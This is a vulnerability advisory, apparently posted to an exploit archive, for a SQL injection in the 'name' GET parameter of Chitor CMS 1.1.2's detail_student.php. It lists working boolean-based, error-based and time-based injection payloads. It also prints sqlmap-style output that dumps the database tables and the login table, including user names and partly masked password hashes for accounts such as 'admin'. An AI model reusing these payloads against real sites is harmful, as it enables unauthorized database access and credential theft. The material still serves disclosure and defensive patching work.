Headline
Chitor CMS 1.1.2 SQL Injection
Chitor CMS version 1.1.2 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to msd0pe in April of 2023.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://github.com/waqaskanju/Chitor-CMS ││ Vendor : Waqas Ahmad ││ Software : Chitor-CMS 1.1.2 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /detail_student.php/detail_student.php?name=[SQLI]&search=SearchGET parameter 'name' is vulnerable to SQLI---Parameter: name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: name=123' AND 7885=7885#&search=Search Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: name=123' AND (SELECT 9128 FROM(SELECT COUNT(*),CONCAT(0x71716b6271,(SELECT (ELT(9128=9128,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DaVE&search=Search Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: name=123' AND (SELECT 1784 FROM (SELECT(SLEEP(5)))AjPI)-- FsLQ&search=Search---GET parameter 'name' is vulnerable to SQLI[+] Starting the Attackfetching current databasecurrent database: ''**********_chitor_db'fetching tables for database: '**********_chitor_db'Database: **********_chitor_db[12 tables]+-----------------+| position || class_subjects || employees || login || marks || school_classes || schools || setting || students_info || subject_teacher || subjects || tab_index |+-----------------+fetching columns for table 'login' in database '**********_chitor_db'Table: login[5 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| Password | varchar(256) || Status | int(11) || Employee_Id | int(11) || Id | int(11) || User_Name | varchar(30) |+-------------+--------------+fetching entries of column(s) 'Employee_Id,Id,User_Name,`Password`,`Status`' for table 'login' in database '**********_chitor_db'Table: login[3 entries]+----+----------+------------------------------------------+-------------+------------+| Id | Status | Password | Employee_Id | User_Name |+----+----------+------------------------------------------+-------------+------------+| 1 | 1 | *****1a7fdd83dd1e2a309ce759***** (****) | 1 | Guest || 2 | 1 | *****82fb3cee50d9272ba79822***** | 2 | **qa*kan** || 3 | 1 | *****f297a57a5a743894a0e4a8***** (****) | 3 | admin |+----+----------+------------------------------------------+-------------+------------+[-] Done